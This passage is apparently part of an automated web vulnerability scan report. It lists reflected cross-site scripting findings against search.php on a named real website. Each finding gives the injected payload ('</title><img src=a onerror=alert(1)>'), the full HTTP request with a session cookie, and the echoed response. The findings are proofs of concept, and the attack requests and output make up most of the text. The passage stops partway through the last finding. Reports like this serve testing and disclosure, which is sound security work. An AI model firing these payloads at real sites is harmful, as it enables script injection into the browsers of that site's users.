The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 59c9e</title><img%20src%3da%20onerror%3dalert(1)>206506a3f26 was submitted in the REST URL parameter 2. This input was echoed as 59c9e</title><img src=a onerror=alert(1)>206506a3f26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes59c9e</title><img%20src%3da%20onerror%3dalert(1)>206506a3f26/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:01:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes59c9e</title><img src=a onerror=alert(1)>206506a3f26/kosmos/images/search.php</title>
...[SNIP]...

2.4599. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 87fc8</title><img%20src%3da%20onerror%3dalert(1)>609ded91758926bb6 was submitted in the REST URL parameter 2. This input was echoed as 87fc8</title><img src=a onerror=alert(1)>609ded91758926bb6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes87fc8</title><img%20src%3da%20onerror%3dalert(1)>609ded91758926bb6/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes87fc8</title><img src=a onerror=alert(1)>609ded91758926bb6/kosmos/images/search.php</title>
...[SNIP]...

2.4600. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 3b73b</title><img%20src%3da%20onerror%3dalert(1)>2f4c68e9760 was submitted in the REST URL parameter 3. This input was echoed as 3b73b</title><img src=a onerror=alert(1)>2f4c68e9760 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos3b73b</title><img%20src%3da%20onerror%3dalert(1)>2f4c68e9760/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos3b73b</title><img src=a onerror=alert(1)>2f4c68e9760/images/search.php</title>
...[SNIP]...

2.4601. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3bf48<img%20src%3da%20onerror%3dalert(1)>8732c302322dcf97e was submitted in the REST URL parameter 3. This input was echoed as 3bf48<img src=a onerror=alert(1)>8732c302322dcf97e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos3bf48<img%20src%3da%20onerror%3dalert(1)>8732c302322dcf97e/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos3bf48<img src=a onerror=alert(1)>8732c302322dcf97e/images/search.php]</td>
...[SNIP]...

2.4602. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 93f7d<img%20src%3da%20onerror%3dalert(1)>329eb02748f was submitted in the REST URL parameter 3. This input was echoed as 93f7d<img src=a onerror=alert(1)>329eb02748f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos93f7d<img%20src%3da%20onerror%3dalert(1)>329eb02748f/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos93f7d<img src=a onerror=alert(1)>329eb02748f/images/search.php]</td>
...[SNIP]...

2.4603. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 39c71</title><img%20src%3da%20onerror%3dalert(1)>4d24dd761b972f1a3 was submitted in the REST URL parameter 3. This input was echoed as 39c71</title><img src=a onerror=alert(1)>4d24dd761b972f1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos39c71</title><img%20src%3da%20onerror%3dalert(1)>4d24dd761b972f1a3/images/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos39c71</title><img src=a onerror=alert(1)>4d24dd761b972f1a3/images/search.php</title>
...[SNIP]...

2.4604. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3ed32<img%20src%3da%20onerror%3dalert(1)>d8344127d733b0db7 was submitted in the REST URL parameter 4. This input was echoed as 3ed32<img src=a onerror=alert(1)>d8344127d733b0db7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images3ed32<img%20src%3da%20onerror%3dalert(1)>d8344127d733b0db7/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images3ed32<img src=a onerror=alert(1)>d8344127d733b0db7/search.php]</td>
...[SNIP]...

2.4605. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 60d42</title><img%20src%3da%20onerror%3dalert(1)>d3f9b2de7f079a064 was submitted in the REST URL parameter 4. This input was echoed as 60d42</title><img src=a onerror=alert(1)>d3f9b2de7f079a064 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images60d42</title><img%20src%3da%20onerror%3dalert(1)>d3f9b2de7f079a064/search.php?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images60d42</title><img src=a onerror=alert(1)>d3f9b2de7f079a064/search.php</title>
...[SNIP]...

2.4606. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as text between TITLE tags. The payload 4705c</title><img%20src%3da%20onerror%3dalert(1)>ecd133c066d was submitted in the REST URL parameter 4. This input was echoed as 4705c</title><img src=a onerror=alert(1)>ecd133c066d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images4705c</title><img%20src%3da%20onerror%3dalert(1)>ecd133c066d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images4705c</title><img src=a onerror=alert(1)>ecd133c066d/search.php</title>
...[SNIP]...

2.4607. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 95ce3<img%20src%3da%20onerror%3dalert(1)>2649b2cd457 was submitted in the REST URL parameter 4. This input was echoed as 95ce3<img src=a onerror=alert(1)>2649b2cd457 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images95ce3<img%20src%3da%20onerror%3dalert(1)>2649b2cd457/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:02:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images95ce3<img src=a onerror=alert(1)>2649b2cd457/search.php]</td>
...[SNIP]...

2.4608. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload d82da</title><img%20src%3da%20onerror%3dalert(1)>a17d56096df was submitted in the REST URL parameter 5. This input was echoed as d82da</title><img src=a onerror=alert(1)>a17d56096df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.phpd82da</title><img%20src%3da%20onerror%3dalert(1)>a17d56096df?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/search.phpd82da</title><img src=a onerror=alert(1)>a17d56096df</title>
...[SNIP]...

2.4609. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c7b1b<img%20src%3da%20onerror%3dalert(1)>b454c354ff9 was submitted in the REST URL parameter 5. This input was echoed as c7b1b<img src=a onerror=alert(1)>b454c354ff9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.phpc7b1b<img%20src%3da%20onerror%3dalert(1)>b454c354ff9?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:03:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/search.phpc7b1b<img src=a onerror=alert(1)>b454c354ff9]</td>
...[SNIP]...

2.4610. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as text between TITLE tags. The payload e1c8d</title><img%20src%3da%20onerror%3dalert(1)>a2e51613ad78a75cf was submitted in the REST URL parameter 5. This input was echoed as e1c8d</title><img src=a onerror=alert(1)>a2e51613ad78a75cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/search.phpe1c8d</title><img%20src%3da%20onerror%3dalert(1)>a2e51613ad78a75cf?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:05:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9868

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/search.phpe1c8d</title><img src=a onerror=alert(1)>a2e51613ad78a75cf</title>
...[SNIP]...

2.4611. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 53dea<img%20src%3da%20onerror%3dalert(1)>5a628fa4cdd3bbb28 was submitted in the REST URL parameter 5. This input was echoed as 53dea<img src=a onerror=alert(1)>5a628fa4cdd3bbb28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/themes/kosmos/images/search.php53dea<img%20src%3da%20onerror%3dalert(1)>5a628fa4cdd3bbb28?keyword=search...&Submit3=Search&opt=2&sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: theme
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : themes/kosmos/images/search.php53dea<img src=a onerror=alert(1)>5a628fa4cdd3bbb28]</td>
...[SNIP]...

2.4612. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as text between TITLE tags. The payload 33d35</title><img%20src%3da%20onerror%3dalert(1)>680ace655db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 33d35</title><img src=a onerror=alert(1)>680ace655db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.php/33d35</title><img%20src%3da%20onerror%3dalert(1)>680ace655db HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9858

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: themes/kosmos/images/search.php/33d35</title><img src=a onerror=alert(1)>680ace655db</title>
...[SNIP]...

2.4613. http://www.resellerbase.com/tag/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc7a9<img%20src%3da%20onerror%3dalert(1)>b45a2d1f06f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc7a9<img src=a onerror=alert(1)>b45a2d1f06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/themes/kosmos/images/search.php/fc7a9<img%20src%3da%20onerror%3dalert(1)>b45a2d1f06f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:53:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9842

